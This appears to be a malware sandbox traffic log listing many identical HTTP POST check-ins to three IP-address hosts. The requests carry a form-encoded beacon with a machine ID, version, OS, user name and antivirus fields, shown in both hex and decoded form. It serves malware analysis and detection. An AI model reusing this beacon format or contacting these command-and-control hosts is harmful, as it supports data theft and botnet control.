                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
